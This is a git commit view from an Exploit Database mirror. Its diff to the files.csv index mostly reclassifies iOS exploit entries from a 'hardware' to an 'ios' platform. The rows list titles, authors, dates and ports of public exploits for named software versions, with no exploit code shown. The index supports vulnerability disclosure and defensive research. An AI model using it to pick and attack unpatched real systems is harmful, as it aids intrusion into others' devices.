bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 04_10_2014

Browse source
This commit is contained in:
Offensive Security 2014-04-10 04:33:37 +00:00
parent 637e59de55
commit 7493f23711
118 changed files with 2807 additions and 83 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

198
files.csv
View file

@ -10207,7 +10207,7 @@ id,file,description,date,author,platform,type,port
11112,platforms/windows/local/11112.c,"HTMLDOC 1.9.x-r1629 local .html buffer overflow(win32) exploit",2010-01-11,"fl0 fl0w",windows,local,0
11113,platforms/php/webapps/11113.txt,"tincan ltd (section) SQL Injection Vulnerability",2010-01-11,"ALTBTA ",php,webapps,0
11116,platforms/php/webapps/11116.html,"Alwjeez Script Database Backup Exploit",2010-01-11,alnjm33,php,webapps,0
11117,platforms/hardware/dos/11117.py,"iOS Udisk FTP Basic Edition - Remote 0day DoS Exploit",2010-01-12,mr_me,hardware,dos,8080
11117,platforms/ios/dos/11117.py,"iOS Udisk FTP Basic Edition - Remote 0day DoS Exploit",2010-01-12,mr_me,ios,dos,8080
11120,platforms/php/webapps/11120.txt,"LayoutCMS 1.0 (SQL/XSS) Multiple Vulnerabilities",2010-01-12,Red-D3v1L,php,webapps,0
11124,platforms/php/webapps/11124.txt,"CiviCRM 3.1 < Beta 5 Multiple XSS Vulnerabilities",2010-01-13,h00die,php,webapps,0
11125,platforms/hardware/dos/11125.pl,"SwiFTP 1.11 - Overflow DoS PoC",2010-01-13,"Julien Bedard",hardware,dos,2121
@ -10329,7 +10329,7 @@ id,file,description,date,author,platform,type,port
11270,platforms/php/webapps/11270.txt,"Joomla VirtueMart Module (Customers_who_bought...) SQL Injection Vulnerability",2010-01-27,B-HUNT3|2,php,webapps,0
11271,platforms/php/webapps/11271.txt,"Joomla Component (com_virtuemart) order_status_id SQL Injection Vulnerability",2010-01-27,B-HUNT3|2,php,webapps,0
11272,platforms/windows/remote/11272.py,"CamShot 1.2 - SEH Overwrite Exploit",2010-01-27,tecnik,windows,remote,0
11273,platforms/hardware/dos/11273.py,"iOS Serversman 3.1.5 - HTTP Remote DoS Exploit",2010-01-27,mr_me,hardware,dos,0
11273,platforms/ios/dos/11273.py,"iOS Serversman 3.1.5 - HTTP Remote DoS Exploit",2010-01-27,mr_me,ios,dos,0
11274,platforms/php/webapps/11274.pl,"Woltlab Burningboard Addon Kleinanzeigenmarkt SQL Injection Exploit",2009-12-21,fred777,php,webapps,0
11276,platforms/windows/dos/11276.txt,"Microsoft Internet Explorer 6.0/7.0 NULL pointer crashes",2010-01-20,Skylined,windows,dos,0
11277,platforms/php/webapps/11277.txt,"Joomla Component com_ccnewsletter Directory Traversal Vulnerability",2010-01-28,B-HUNT3|2,php,webapps,0
@ -10493,11 +10493,11 @@ id,file,description,date,author,platform,type,port
11464,platforms/php/webapps/11464.txt,"Joomla Component com_hdvideoshare SQL Injection Vulnerability",2010-02-15,snakespc,php,webapps,0
11465,platforms/windows/local/11465.py,"Ollydbg 2.00 Beta1 Local Buffer Overflow Exploit",2010-02-15,_SuBz3r0_,windows,local,0
11466,platforms/php/webapps/11466.txt,"microUpload Shell Upload Vulnerability",2010-02-15,Phenom,php,webapps,0
11467,platforms/hardware/dos/11467.py,"iOS My DBLite Edition - Remote 0day DoS Exploit",2010-02-15,"Jason Bowes",hardware,dos,0
11467,platforms/ios/dos/11467.py,"iOS My DBLite Edition - Remote 0day DoS Exploit",2010-02-15,"Jason Bowes",ios,dos,0
11468,platforms/windows/remote/11468.py,"Easy~Ftp Server 1.7.0.2 - Post-Authentication BoF",2010-02-15,dookie,windows,remote,21
11469,platforms/windows/dos/11469.py,"Easy~Ftp Server 1.7.0.2 - Post-Authentication BoF (SEH) (PoC)",2010-02-15,loneferret,windows,dos,0
11470,platforms/windows/dos/11470.py,"Easy~Ftp Server 1.7.0.2 - Post-Authentication BoF (PoC)",2010-02-15,loneferret,windows,dos,0
11472,platforms/hardware/dos/11472.py,"iOS FTP On The Go 2.1.2 - HTTP Remote DoS",2010-02-15,TecR0c,hardware,dos,0
11472,platforms/ios/dos/11472.py,"iOS FTP On The Go 2.1.2 - HTTP Remote DoS",2010-02-15,TecR0c,ios,dos,0
11473,platforms/php/webapps/11473.txt,"Pogodny CMS SQL Injection Vulnerability",2010-02-16,Ariko-Security,php,webapps,0
11474,platforms/php/webapps/11474.txt,"Mambo Component com_acnews [id] SQL Injection Vulnerability",2010-02-16,"Zero Bits and Xzit3",php,webapps,0
11475,platforms/windows/local/11475.txt,"OtsTurntables Free 1.00.047 - (.olf) Universal Buffer Overflow Exploit",2010-02-16,mr_me,windows,local,0
@ -10523,7 +10523,7 @@ id,file,description,date,author,platform,type,port
11496,platforms/php/webapps/11496.txt,"Open Source Classifieds 1.1.0 - Alpha (OSClassi) Multiple Vulnerabilities",2010-02-18,"Sioma Labs",php,webapps,0
11497,platforms/linux/remote/11497.txt,"gitWeb 1.5.2 - Remote Command Execution",2010-02-18,"S2 Crew",linux,remote,0
11498,platforms/php/webapps/11498.txt,"Joomla Plugin Core Design Scriptegrator Local File Inclusion Vulnerability",2010-02-18,"S2 Crew",php,webapps,0
11499,platforms/hardware/dos/11499.pl,"iOS FileApp 1.7 - Remote DoS Exploit",2010-02-18,Ale46,hardware,dos,0
11499,platforms/ios/dos/11499.pl,"iOS FileApp 1.7 - Remote DoS Exploit",2010-02-18,Ale46,ios,dos,0
11500,platforms/windows/remote/11500.py,"Easy~Ftp Server 1.7.0.2 - (HTTP) Remote BoF Exploit",2010-02-18,"ThE g0bL!N",windows,remote,0
11502,platforms/php/webapps/11502.txt,"phpAutoVideo CSRF Vulnerability",2010-02-19,GoLdeN-z3r0,php,webapps,0
11503,platforms/php/webapps/11503.txt,"Litespeed Web Server 4.0.12 - (Add Admin) CSRF and XSS Vulnerabilities",2010-02-19,d1dn0t,php,webapps,0
@ -10537,7 +10537,7 @@ id,file,description,date,author,platform,type,port
11517,platforms/php/webapps/11517.txt,"Netzbrett Database Disclosure Vulnerability",2010-02-20,"ViRuSMaN ",php,webapps,0
11518,platforms/php/webapps/11518.txt,"Softbiz Jobs (news_desc) SQL Injection Vulnerability",2010-02-22,BAYBORA,php,webapps,0
11519,platforms/php/webapps/11519.txt,"Ac4p.com Gallery 1.0 - Multiple Vulnerabilities",2010-02-22,indoushka,php,webapps,0
11520,platforms/hardware/dos/11520.pl,"iOS iFTPStorage 1.2 - Remote Dos Exploit",2010-02-22,Ale46,hardware,dos,0
11520,platforms/ios/dos/11520.pl,"iOS iFTPStorage 1.2 - Remote Dos Exploit",2010-02-22,Ale46,ios,dos,0
11521,platforms/php/webapps/11521.txt,"Ero Auktion 2.0 - (news.php) SQL Injection Vulnerability",2010-02-22,"Easy Laster",php,webapps,0
11522,platforms/php/webapps/11522.txt,"Ero Auktion 2010 - (news.php) SQL Injection Vulnerability",2010-02-22,"Easy Laster",php,webapps,0
11523,platforms/php/webapps/11523.txt,"Galerie Dezign-Box France - Multiple Vulnerabilities",2010-02-22,indoushka,php,webapps,0
@ -10857,8 +10857,8 @@ id,file,description,date,author,platform,type,port
11886,platforms/windows/remote/11886.py,"SAP MaxDB Malformed Handshake Request Remote Code Execution",2010-03-26,"S2 Crew",windows,remote,0
11888,platforms/php/webapps/11888.txt,"DaFun Spirit 2.2.5 - Multiple Remote File Include Vulnerability",2010-03-26,2010-03-26,php,webapps,0
11889,platforms/php/webapps/11889.txt,"leaftec cms multiple vulnerabilities",2010-03-26,Valentin,php,webapps,0
11890,platforms/hardware/dos/11890.txt,"iOS Safari - Bad ""VML"" Remote DoS",2010-03-26,"Nishant Das Patnaik",hardware,dos,0
11891,platforms/hardware/dos/11891.txt,"iOS Safari - Remote DoS",2010-03-26,"Nishant Das Patnaik",hardware,dos,0
11890,platforms/ios/dos/11890.txt,"iOS Safari - Bad ""VML"" Remote DoS",2010-03-26,"Nishant Das Patnaik",ios,dos,0
11891,platforms/ios/dos/11891.txt,"iOS Safari - Remote DoS",2010-03-26,"Nishant Das Patnaik",ios,dos,0
11892,platforms/php/webapps/11892.txt,"post Card (catid) Remote SQL Injection Vulnerability",2010-03-26,"Hussin X",php,webapps,0
11893,platforms/linux/dos/11893.pl,"tPop3d 1.5.3 DoS",2010-03-26,OrderZero,linux,dos,0
11894,platforms/php/webapps/11894.txt,"cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability",2010-03-26,eidelweiss,php,webapps,0
@ -12181,8 +12181,8 @@ id,file,description,date,author,platform,type,port
13865,platforms/php/webapps/13865.txt,"Daily Inspirational Quotes Script SQL Injection Vulnerability",2010-06-14,Valentin,php,webapps,0
13866,platforms/php/webapps/13866.txt,"Joke Website Script SQL Injection and Cross-Site Scripting Vulnerabilities",2010-06-14,Valentin,php,webapps,0
13867,platforms/php/webapps/13867.txt,"E-Book Store SQL Injection Vulnerability",2010-06-14,Valentin,php,webapps,0
13870,platforms/hardware/dos/13870.py,"iOS QuickOffice 3.1.0 - HTTP Method Remote DoS",2010-06-14,"Nishant Das Patnaik",hardware,dos,0
13871,platforms/hardware/dos/13871.py,"iOS Impact PDF Reader 2.0 - POST Method Remote DoS",2010-06-14,"Nishant Das Patnaik",hardware,dos,0
13870,platforms/ios/dos/13870.py,"iOS QuickOffice 3.1.0 - HTTP Method Remote DoS",2010-06-14,"Nishant Das Patnaik",ios,dos,0
13871,platforms/ios/dos/13871.py,"iOS Impact PDF Reader 2.0 - POST Method Remote DoS",2010-06-14,"Nishant Das Patnaik",ios,dos,0
13872,platforms/windows/dos/13872.txt,"SumatraPDF 1.1 - Denial of Service PoC",2010-06-14,"Matthew Bergin",windows,dos,0
13875,platforms/solaris_x86/shellcode/13875.c,"Solaris/x86 - Sync() & reboot() & exit(0) - 48 bytes",2010-06-14,"Jonathan Salwan",solaris_x86,shellcode,0
13876,platforms/windows/dos/13876.py,"File Sharing Wizard 1.5.0 - Buffer Overflow PoC",2010-06-15,m-1-k-3,windows,dos,0
@ -12728,7 +12728,7 @@ id,file,description,date,author,platform,type,port
14534,platforms/php/webapps/14534.txt,"68KB 1.0.0rc4 - Remote File Include Vulnerability",2010-08-03,eidelweiss,php,webapps,0
14536,platforms/hardware/remote/14536.txt,"Unauthorized Access to Root NFS Export on EMC Celerra NAS Appliance",2010-08-03,"Trustwave's SpiderLabs",hardware,remote,0
14537,platforms/multiple/dos/14537.txt,"Oracle MySQL 'ALTER DATABASE' Remote Denial of Service Vulnerability",2010-08-03,"Shane Bester",multiple,dos,0
14538,platforms/hardware/local/14538.txt,"Apple iOS pdf Jailbreak Exploit",2010-08-03,jailbreakme,hardware,local,0
14538,platforms/ios/local/14538.txt,"Apple iOS pdf Jailbreak Exploit",2010-08-03,jailbreakme,ios,local,0
14539,platforms/windows/remote/14539.html,"FathFTP 1.8 (RasIsConnected Method) ActiveX Buffer Overflow (SEH)",2010-08-03,Madjix,windows,remote,0
14541,platforms/php/webapps/14541.txt,"WordPress NextGEN Smooth Gallery 0.12 - Blind SQL Injection Vulnerability",2010-08-03,kaMtiEz,php,webapps,0
14545,platforms/windows/dos/14545.txt,"Progitek Visionner Photos 2.0 - File Format DoS",2010-08-03,antrhacks,windows,dos,0
@ -13183,8 +13183,8 @@ id,file,description,date,author,platform,type,port
15183,platforms/asp/webapps/15183.py,"Bka Haber 1.0 (Tr) - File Disclosure Exploit",2010-10-02,ZoRLu,asp,webapps,0
15184,platforms/windows/local/15184.c,"AudioTran 1.4.2.4 SafeSEH+SEHOP Exploit",2010-10-02,x90c,windows,local,0
15185,platforms/asp/webapps/15185.txt,"SmarterMail 7.x (7.2.3925) - Stored Cross Site Scripting Vulnerability",2010-10-02,sqlhacker,asp,webapps,0
15186,platforms/hardware/remote/15186.txt,"iOS FileApp < 2.0 - Directory Traversal Vulnerability",2010-10-02,m0ebiusc0de,hardware,remote,0
15188,platforms/hardware/dos/15188.py,"iOS FileApp < 2.0 - FTP Remote Denial of Service Exploit",2010-10-02,m0ebiusc0de,hardware,dos,0
15186,platforms/ios/remote/15186.txt,"iOS FileApp < 2.0 - Directory Traversal Vulnerability",2010-10-02,m0ebiusc0de,ios,remote,0
15188,platforms/ios/dos/15188.py,"iOS FileApp < 2.0 - FTP Remote Denial of Service Exploit",2010-10-02,m0ebiusc0de,ios,dos,0
15189,platforms/asp/webapps/15189.txt,"SmarterMail 7.x (7.2.3925) LDAP Injection Vulnerability",2010-10-02,sqlhacker,asp,webapps,0
15191,platforms/asp/webapps/15191.txt,"TradeMC E-Ticaret SQL and XSS Multiple Vulnerabilities",2010-10-02,KnocKout,asp,webapps,0
15193,platforms/windows/dos/15193.pl,"Hanso Player 1.3.0 - (.m3u) Denial of Service Vulnerability",2010-10-03,"xsploited security",windows,dos,0
@ -13576,7 +13576,7 @@ id,file,description,date,author,platform,type,port
15661,platforms/asp/webapps/15661.txt,"Ananda Real Estate 3.4 (list.asp) Multiple SQL Injection",2010-12-02,underground-stockholm.com,asp,webapps,0
15662,platforms/linux/remote/15662.txt,"ProFTPD 1.3.3c compromised source remote root Trojan",2010-12-02,anonymous,linux,remote,21
15663,platforms/windows/local/15663.py,"MediaCoder <= 0.7.5.4797 .m3u Buffer Overflow (SEH)",2010-12-02,"Oh Yaw Theng",windows,local,0
15664,platforms/hardware/remote/15664.txt,"iOS iFTPStorage <= 1.3 - Directory Traversal",2010-12-03,XEL,hardware,remote,0
15664,platforms/ios/remote/15664.txt,"iOS iFTPStorage <= 1.3 - Directory Traversal",2010-12-03,XEL,ios,remote,0
15665,platforms/asp/webapps/15665.txt,"Easy Travel Portal 2 - (travelbycountry.asp) SQL Injection Vulnerability",2010-12-03,"Ulrik Persson",asp,webapps,0
15666,platforms/hardware/webapps/15666.txt,"Multiple D-Link Router Models Authentication Bypass Vulnerability",2010-12-03,"Craig Heffner",hardware,webapps,0
15668,platforms/windows/remote/15668.html,"Image Viewer CP Gold 6 ActiveX TifMergeMultiFiles() Buffer Overflow",2010-12-03,Dr_IDE,windows,remote,0
@ -13998,8 +13998,8 @@ id,file,description,date,author,platform,type,port
16205,platforms/asp/webapps/16205.txt,"DIY Web CMS Multiple Vulnerabilities",2011-02-22,p0pc0rn,asp,webapps,0
16206,platforms/php/webapps/16206.txt,"Galilery 1.0 - Local File Inclusion Vulnerability",2011-02-22,lemlajt,php,webapps,0
16207,platforms/php/webapps/16207.txt,"dotproject 2.1.5 - Multiple Vulnerabilities",2011-02-22,lemlajt,php,webapps,0
16208,platforms/hardware/remote/16208.txt,"iOS FtpDisc 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0
16209,platforms/hardware/remote/16209.txt,"iOS SideBooks 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0
16208,platforms/ios/remote/16208.txt,"iOS FtpDisc 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0
16209,platforms/ios/remote/16209.txt,"iOS SideBooks 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0
16213,platforms/php/webapps/16213.txt,"Hyena Cart (index.php) SQL Injection Vulnerability",2011-02-23,"AtT4CKxT3rR0r1ST ",php,webapps,0
16214,platforms/php/webapps/16214.txt,"tplSoccerStats (player.php) SQL Injection Vulnerability",2011-02-23,"AtT4CKxT3rR0r1ST ",php,webapps,0
16216,platforms/linux/dos/16216.txt,"Red Hat Linux stickiness of /tmp",2011-02-23,"Tavis Ormandy",linux,dos,0
@ -14012,10 +14012,10 @@ id,file,description,date,author,platform,type,port
16225,platforms/cfm/webapps/16225.txt,"Alcassoft's SOPHIA CMS SQL Injection Vulnerability",2011-02-24,p0pc0rn,cfm,webapps,0
16226,platforms/hardware/remote/16226.txt,"iSO Air Files 2.6 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0
16227,platforms/hardware/remote/16227.txt,"iSO Filer Lite 2.1.0 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0
16228,platforms/hardware/remote/16228.txt,"iOS iDocManager 1.0.0 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0
16229,platforms/hardware/remote/16229.txt,"iOS myDBLite 1.1.10 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0
16228,platforms/ios/remote/16228.txt,"iOS iDocManager 1.0.0 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0
16229,platforms/ios/remote/16229.txt,"iOS myDBLite 1.1.10 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0
16230,platforms/windows/dos/16230.py,"Victory FTP Server 5.0 - Denial of Service Exploit",2011-02-24,"C4SS!0 G0M3S",windows,dos,0
16231,platforms/hardware/remote/16231.txt,"iOS Share 1.0 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0
16231,platforms/ios/remote/16231.txt,"iOS Share 1.0 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0
16232,platforms/php/webapps/16232.txt,"GigPress 2.1.10 Wordpress Plugin Stored XSS Vulnerability",2011-02-24,"Saif El-Sherei",php,webapps,0
16233,platforms/php/webapps/16233.txt,"Relevanssi 2.7.2 Wordpress Plugin Stored XSS Vulnerability",2011-02-24,"Saif El-Sherei",php,webapps,0
16234,platforms/netware/dos/16234.rb,"Novell Netware RPC XNFS xdrDecodeString Vulnerability",2011-02-24,"Francis Provencher",netware,dos,0
@ -14053,13 +14053,13 @@ id,file,description,date,author,platform,type,port
16267,platforms/php/webapps/16267.txt,"bitweaver 2.8.0 - Multiple Vulnerabilities",2011-03-02,lemlajt,php,webapps,0
16268,platforms/php/webapps/16268.pl,"cChatBox for vBulletin 3.6.8 and 3.7.x SQL Injection Vulnerability",2011-03-02,DSecurity,php,webapps,0
16270,platforms/linux/dos/16270.c,"vsftpd 2.3.2 - Denial of Service Vulnerability",2011-03-02,"Maksymilian Arciemowicz",linux,dos,0
16271,platforms/hardware/remote/16271.txt,"iOS TIOD 1.3.3 - Directory Traversal",2011-03-03,"R3d@l3rt, H@ckk3y",hardware,remote,0
16271,platforms/ios/remote/16271.txt,"iOS TIOD 1.3.3 - Directory Traversal",2011-03-03,"R3d@l3rt, H@ckk3y",ios,remote,0
16272,platforms/php/webapps/16272.txt,"Limelight Software (article.php) SQL Injection Vulnerability",2011-03-04,eXeSoul,php,webapps,0
16273,platforms/php/webapps/16273.php,"PHP Speedy <= 0.5.2 Wordpress Plugin (admin_container.php) Remote Code Exec Exploit",2011-03-04,mr_me,php,webapps,0
16274,platforms/jsp/webapps/16274.pl,"JBoss Application Server Remote Exploit",2011-03-04,kingcope,jsp,webapps,0
16275,platforms/hardware/remote/16275.txt,"Comtrend ADSL Router CT-5367 C01_R12 Remote Root",2011-03-04,"Todor Donev",hardware,remote,0
16276,platforms/php/webapps/16276.txt,"ADAN Neuronlabs (view.php) SQL Injection Vulnerability",2011-03-04,IRAQ_JAGUAR,php,webapps,0
16278,platforms/hardware/remote/16278.py,"iOS iFileExplorer Free - Directory Traversal",2011-03-04,theSmallNothin,hardware,remote,0
16278,platforms/ios/remote/16278.py,"iOS iFileExplorer Free - Directory Traversal",2011-03-04,theSmallNothin,ios,remote,0
16279,platforms/php/webapps/16279.txt,"MySms 1.0 - Multiple Vulnerabilities",2011-03-05,"AtT4CKxT3rR0r1ST ",php,webapps,0
16280,platforms/php/webapps/16280.py,"Vtiger CRM 5.0.4 Pre-Auth Local File Inclusion Exploit",2011-03-05,TecR0c,php,webapps,0
16281,platforms/php/webapps/16281.txt,"BoutikOne (description.php) SQL Injection Vulnerability",2011-03-05,IRAQ_JAGUAR,php,webapps,0
@ -14746,7 +14746,7 @@ id,file,description,date,author,platform,type,port
16969,platforms/php/webapps/16969.txt,"Log1 CMS 2.0 - Multiple Vulnerabilities",2011-03-14,Aodrulez,php,webapps,0
16970,platforms/windows/remote/16970.rb,"Kolibri <= 2.0 - HTTP Server HEAD Buffer Overflow",2011-08-03,metasploit,windows,remote,0
16971,platforms/windows/local/16971.py,"ABBS Audio Media Player Buffer Overflow Exploit (M3U/LST)",2011-03-14,Rh0,windows,local,0
16972,platforms/hardware/remote/16972.txt,"iOS Checkview 1.1 - Directory Traversal",2011-03-14,kim@story,hardware,remote,0
16972,platforms/ios/remote/16972.txt,"iOS Checkview 1.1 - Directory Traversal",2011-03-14,kim@story,ios,remote,0
16973,platforms/linux/dos/16973.c,"Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT Leak Exploit",2011-03-14,prdelka,linux,dos,0
16974,platforms/android/remote/16974.html,"Android 2.0 ,2.1, 2.1.1 - WebKit Use-After-Free Exploit",2011-03-14,"MJ Keith",android,remote,0
16975,platforms/asp/webapps/16975.txt,"SmarterMail 8.0 - Multiple XSS Vulnerabilities",2011-03-14,"Hoyt LLC Research",asp,webapps,0
@ -16336,7 +16336,7 @@ id,file,description,date,author,platform,type,port
18926,platforms/windows/dos/18926.php,"bsnes 0.87 - Local Denial of Service",2012-05-25,"Yakir Wizman",windows,dos,0
18927,platforms/php/webapps/18927.txt,"socialengine 4.2.2 - Multiple Vulnerabilities",2012-05-25,i4k,php,webapps,0
18929,platforms/windows/remote/18929.rb,"RabidHamster R4 Log Entry sprintf() Buffer Overflow",2012-05-25,metasploit,windows,remote,0
18931,platforms/hardware/dos/18931.rb,"iOS <= 5.1.1 Safari Browser - JS match(), search() Crash PoC",2012-05-25,"Alberto Ortega",hardware,dos,0
18931,platforms/ios/dos/18931.rb,"iOS <= 5.1.1 Safari Browser - JS match(), search() Crash PoC",2012-05-25,"Alberto Ortega",ios,dos,0
18932,platforms/linux/remote/18932.py,"Symantec Web Gateway 5.0.2 - Remote LFI Root Exploit",2012-05-26,muts,linux,remote,0
18933,platforms/windows/remote/18933.rb,"quickshare file share 1.2.1 - Directory Traversal vulnerability",2012-05-27,metasploit,windows,remote,0
18934,platforms/php/webapps/18934.rb,"WeBid converter.php Remote PHP Code Injection",2012-05-27,metasploit,php,webapps,0
@ -19116,8 +19116,8 @@ id,file,description,date,author,platform,type,port
21864,platforms/php/webapps/21864.txt,"PHPWebSite 0.8.3 News Message HTML Injection Vulnerability",2002-09-25,das@hush.com,php,webapps,0
21865,platforms/linux/local/21865.c,"Interbase 5/6 GDS_Lock_MGR UMask File Permission Changing Vulnerability",2002-09-25,grazer,linux,local,0
21866,platforms/multiple/webapps/21866.txt,"ServersCheck Monitoring Software 9.0.12 / 9.0.14 - Stored XSS",2012-10-10,loneferret,multiple,webapps,0
21868,platforms/hardware/remote/21868.rb,"Apple iOS MobileSafari LibTIFF Buffer Overflow",2012-10-09,metasploit,hardware,remote,0
21869,platforms/hardware/remote/21869.rb,"Apple iOS MobileMail LibTIFF Buffer Overflow",2012-10-09,metasploit,hardware,remote,0
21868,platforms/ios/remote/21868.rb,"Apple iOS MobileSafari LibTIFF Buffer Overflow",2012-10-09,metasploit,ios,remote,0
21869,platforms/ios/remote/21869.rb,"Apple iOS MobileMail LibTIFF Buffer Overflow",2012-10-09,metasploit,ios,remote,0
21870,platforms/linux/remote/21870.txt,"Zope 2.x Incorrect XML-RPC Request Information Disclosure Vulnerability",2002-09-26,"Rossen Raykov",linux,remote,0
21871,platforms/linux/local/21871.c,"GV 2.x/3.x Malformed PDF/PS File Buffer Overflow Vulnerability (1)",2002-09-26,zen-parse,linux,local,0
21872,platforms/linux/local/21872.c,"GV 2.x/3.x Malformed PDF/PS File Buffer Overflow Vulnerability (2)",2002-09-26,infamous42md,linux,local,0
@ -21694,7 +21694,7 @@ id,file,description,date,author,platform,type,port
24539,platforms/multiple/remote/24539.rb,"Java Applet JMX Remote Code Execution",2013-02-25,metasploit,multiple,remote,0
24540,platforms/php/webapps/24540.pl,"Brewthology 0.1 - SQL Injection Exploit",2013-02-26,"cr4wl3r ",php,webapps,0
24542,platforms/php/webapps/24542.txt,"Rix4Web Portal - Blind SQL Injection Vulnerability",2013-02-26,L0n3ly-H34rT,php,webapps,0
24543,platforms/hardware/webapps/24543.txt,"iOS IPMap 2.5 - Arbitrary File Upload",2013-02-26,Vulnerability-Lab,hardware,webapps,0
24543,platforms/ios/webapps/24543.txt,"iOS IPMap 2.5 - Arbitrary File Upload",2013-02-26,Vulnerability-Lab,ios,webapps,0
24544,platforms/php/webapps/24544.txt,"MTP Image Gallery 1.0 (edit_photos.php, title param) - XSS Vulnerability",2013-02-26,LiquidWorm,php,webapps,0
24545,platforms/php/webapps/24545.txt,"MTP Guestbook 1.0 - Multiple XSS Vulnerabilities",2013-02-26,LiquidWorm,php,webapps,0
24546,platforms/php/webapps/24546.txt,"MTP Poll 1.0 - Multiple XSS Vulnerabilities",2013-02-26,LiquidWorm,php,webapps,0
@ -21748,7 +21748,7 @@ id,file,description,date,author,platform,type,port
24599,platforms/linux/dos/24599.txt,"CUPS 1.1.x UDP Packet Remote Denial of Service Vulnerability",2004-09-15,"Alvaro Martinez Echevarria",linux,dos,0
24600,platforms/windows/remote/24600.txt,"myserver 0.7 - Directory Traversal vulnerability",2004-09-15,scrap,windows,remote,0
24601,platforms/php/webapps/24601.txt,"BBS E-Market Professional bf_130 (1.3.0) - Multiple File Disclosure Vulnerabilities",2004-09-15,"Jeong Jin-Seok",php,webapps,0
24603,platforms/hardware/webapps/24603.txt,"Remote File Manager 1.2 iOS - Multiple Vulnerabilities",2013-03-06,Vulnerability-Lab,hardware,webapps,0
24603,platforms/ios/webapps/24603.txt,"Remote File Manager 1.2 iOS - Multiple Vulnerabilities",2013-03-06,Vulnerability-Lab,ios,webapps,0
24604,platforms/asp/webapps/24604.txt,"Snitz Forums 2000 Down.ASP HTTP Response Splitting Vulnerability",2004-09-16,"Maestro De-Seguridad",asp,webapps,0
24605,platforms/windows/dos/24605.txt,"Microsoft Windows XP Explorer.EXE TIFF Image Denial of Service Vulnerability",2004-09-16,"Jason Summers",windows,dos,0
24606,platforms/linux/local/24606.c,"Sudo 1.6.8 Information Disclosure Vulnerability",2004-09-18,"Rosiello Security",linux,local,0
@ -22527,12 +22527,12 @@ id,file,description,date,author,platform,type,port
25409,platforms/php/webapps/25409.txt,"Ajax Availability Calendar 3.x.x - Multiple Vulnerabilties",2013-05-13,"AtT4CKxT3rR0r1ST ",php,webapps,0
25410,platforms/php/webapps/25410.txt,"Joomla S5 Clan Roster com_s5clanroster (index.php, id param) - SQL Injection",2013-05-13,"AtT4CKxT3rR0r1ST ",php,webapps,0
25411,platforms/linux/local/25411.py,"No-IP Dynamic Update Client (DUC) 2.1.9 - Local IP Address Stack Overflow",2013-05-13,"Alberto Ortega",linux,local,0
25412,platforms/hardware/webapps/25412.txt,"Wireless Disk PRO 2.3 iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,hardware,webapps,0
25412,platforms/ios/webapps/25412.txt,"Wireless Disk PRO 2.3 iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,ios,webapps,0
25413,platforms/hardware/webapps/25413.txt,"Wifi Photo Transfer 2.1 & 1.1 PRO - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,hardware,webapps,0
25414,platforms/hardware/webapps/25414.txt,"Wifi Album 1.47 iOS - Command Injection Vulnerability",2013-05-13,Vulnerability-Lab,hardware,webapps,0
25415,platforms/hardware/webapps/25415.txt,"Wireless Photo Access 1.0.10 iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,hardware,webapps,0
25414,platforms/ios/webapps/25414.txt,"Wifi Album 1.47 iOS - Command Injection Vulnerability",2013-05-13,Vulnerability-Lab,ios,webapps,0
25415,platforms/ios/webapps/25415.txt,"Wireless Photo Access 1.0.10 iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,ios,webapps,0
25416,platforms/hardware/webapps/25416.txt,"SimpleTransfer 2.2.1 - Command Injection Vulnerabilities",2013-05-13,Vulnerability-Lab,hardware,webapps,0
25417,platforms/hardware/webapps/25417.txt,"File Lite 3.3 & 3.5 PRO iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,hardware,webapps,0
25417,platforms/ios/webapps/25417.txt,"File Lite 3.3 & 3.5 PRO iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,ios,webapps,0
25418,platforms/windows/dos/25418.py,"MiniWeb MiniWeb HTTP Server (build 300) - Crash PoC",2013-05-13,dmnt,windows,dos,0
25419,platforms/windows/local/25419.pl,"Adrenalin Player 2.2.5.3 (.m3u) - Buffer Overflow Exploit (SEH)",2013-05-13,seaofglass,windows,local,0
25420,platforms/multiple/remote/25420.txt,"IBM WebSphere 5.0/5.1/6.0 Application Server Web Server Root JSP Source Code Disclosure Vulnerability",2005-04-13,"SPI Labs",multiple,remote,0
@ -23967,9 +23967,9 @@ id,file,description,date,author,platform,type,port
26885,platforms/php/webapps/26885.txt,"Lighthouse CMS 1.1 Search Cross-Site Scripting Vulnerability",2005-12-19,r0t3d3Vil,php,webapps,0
26886,platforms/linux/dos/26886.pl,"Squid 3.3.5 - DoS PoC",2013-07-16,kingcope,linux,dos,0
26887,platforms/linux/dos/26887.rb,"rpcbind (CALLIT Procedure) UDP Crash PoC",2013-07-16,"Sean Verity",linux,dos,0
26888,platforms/hardware/webapps/26888.txt,"FTP Sprite 1.2.1 iOS - Persistent XSS Vulnerability",2013-07-16,Vulnerability-Lab,hardware,webapps,0
26888,platforms/ios/webapps/26888.txt,"FTP Sprite 1.2.1 iOS - Persistent XSS Vulnerability",2013-07-16,Vulnerability-Lab,ios,webapps,0
